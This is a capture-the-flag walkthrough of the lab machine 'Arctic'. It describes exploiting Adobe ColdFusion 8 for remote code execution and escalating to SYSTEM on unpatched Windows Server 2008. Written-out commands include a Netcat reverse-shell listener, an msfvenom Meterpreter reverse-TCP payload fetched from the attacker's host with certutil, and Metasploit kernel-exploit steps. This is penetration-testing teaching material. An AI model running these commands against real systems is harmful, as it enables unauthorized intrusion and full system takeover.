Overview

Arctic is an easy Windows machine that demonstrates how an exposed legacy Adobe ColdFusion service can lead to remote code execution, followed by local privilege escalation through an unpatched Windows kernel vulnerability.

Attack Chain

  • Enumerate exposed TCP services with nmap
  • Identify Adobe ColdFusion running on port 8500
  • Browse the exposed CFIDE and cfdocs directories
  • Confirm the ColdFusion 8 Administrator interface
  • Use a public ColdFusion 8 remote command execution exploit
  • Modify the exploit parameters and catch a shell as tolis
  • Generate and transfer a Meterpreter payload
  • Run Metasploit local_exploit_suggester
  • Exploit cve_2019_1458_wizardopium
  • Gain a shell as NT AUTHORITY\SYSTEM

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.129.13.248; export NAME=ARTIC; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

135,8500,49154

nmap results

Findings

The scan shows a small attack surface. RPC (135) and a high RPC port are exposed, but the main point of interest is port 8500, which is hosting a web service. Since this is not a standard HTTP port, it is worth browsing manually to understand what application is running.

Web Enumeration

Directory Listing on Port 8500

Browsing to port 8500 reveals an open directory listing.

web directory listing

The /CFIDE path also exposes a directory listing.

cfide directory listing

The cfdocs directory appears to contain documentation and sample material for ColdFusion.

cfdocs listing

ColdFusion Administrator

The /CFIDE/Administrator endpoint leads to an Adobe ColdFusion 8 Administrator login page. The admin username is already filled in and greyed out, which confirms that this is the administrative interface for the ColdFusion instance.

coldfusion administrator login

At this point, the exposed version is the key finding. Adobe ColdFusion 8 has known public exploits, so the next step is to look for a matching remote code execution path.

Foothold

ColdFusion 8 Remote Code Execution

A public remote command execution exploit is available for ColdFusion 8.

https://www.exploit-db.com/exploits/50057

After downloading the exploit, some parameters need to be modified so that it points to the target and calls back to the attacking machine.

modified coldfusion exploit

Before running the exploit, we start a Netcat listener on port 443 using rlwrap for a better shell experience.

rlwrap -cAr nc -lvnp 443

The exploit is then executed.

execute exploit

The exploit continues running and triggers the callback.

execute exploit callback

A shell is caught as the user tolis.

shell as tolis

The user flag can now be read.

type C:\Users\tolis\Desktop\user.txt

user flag

Privilege Escalation

System Enumeration

After gaining a shell as tolis, we check the operating system details with systeminfo.

systeminfo

The target is running Windows Server 2008.

systeminfo windows version

The build is 7600, and there are no installed hotfixes. This strongly suggests that the system is missing several important security patches.

systeminfo hotfixes

Because this is an older unpatched Windows host, kernel exploits are a likely privilege escalation path. To make exploit selection easier, we use Metasploit’s local_exploit_suggester, but first we need to establish a Meterpreter session.

Meterpreter Payload

On the attacking machine, we generate a Windows Meterpreter payload with msfvenom.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.17 LPORT=4545 -f exe -o met4545.exe

msfvenom payload

The payload is then downloaded to the target using certutil.

certutil.exe -urlcache -f http://10.10.14.17/met4545.exe .\met4545.exe

certutil payload download

Back in Metasploit, we configure a multi/handler for the Meterpreter payload. Once the handler is running, the payload is executed on the target.

cmd /c c:\users\public\met4545.exe

execute meterpreter payload

A Meterpreter session is received as tolis.

meterpreter as tolis

Exploit Suggester

With the Meterpreter session established, we background it and run Metasploit’s local exploit suggester.

search exploit_suggester
use 0
set session 1
run

The module identifies several possible local privilege escalation options. In this case, exploit/windows/local/cve_2019_1458_wizardopium is selected because it has worked reliably against Windows build 7600 in similar environments.

exploit suggester results

The exploit is configured with the existing Meterpreter session and a new callback port.

use exploit/windows/local/cve_2019_1458_wizardopium
set session 1
set lhost 10.10.14.17
set lport 4646
run

wizardopium exploit run

The exploit runs without errors.

wizardopium exploit success

A new shell is obtained as NT AUTHORITY\SYSTEM.

system shell

The root flag can now be read.

type C:\Users\Administrator\Desktop\root.txt

root flag

Key Takeaways

Arctic shows how dangerous exposed legacy software can be when it is left unpatched. Adobe ColdFusion 8 provided a direct remote code execution path, and the underlying Windows Server 2008 host had no hotfixes installed, making local privilege escalation straightforward. The compromise path is simple, but it reinforces the importance of patching both internet-facing applications and the operating system underneath them.